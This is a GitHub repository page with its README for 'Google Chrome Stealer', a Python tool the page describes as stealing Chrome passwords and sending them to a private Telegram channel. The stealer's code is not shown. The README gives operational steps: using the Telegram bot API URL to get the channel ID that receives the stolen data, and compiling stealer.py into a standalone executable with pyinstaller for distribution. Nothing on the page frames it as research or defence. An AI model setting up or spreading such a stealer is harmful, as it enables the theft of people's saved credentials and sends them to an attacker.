Skip to content

Simple Google Chrome stealer, sends passwords via Telegram into private channel

Notifications You must be signed in to change notification settings

MLX15/Google-Stealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

Google Chrome Stealer

To obtain private channel ID:

  1. Convert it to public with some @channelName
  2. Send test message using this URL:
    https://api.telegram.org/bot%TOKEN%/sendMessage?chat_id=@channelName&text=test
  3. As response we will get something like this:
    {"ok": true, "result": {"chat": {"id": %CHANNEL_ID%, "title": "Test Private Channel", "type": "channel"}, "date": 1448245538, "message_id": 7, "text": "test"}}
  4. Now you can convert it back to private and use obtained ID

To compile stealer:

  1. Install pyinstaller using pip
    pip install pyinstaller
  2. Execute following command to compile:
    pyinstaller -F stealer.py

About

Simple Google Chrome stealer, sends passwords via Telegram into private channel

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages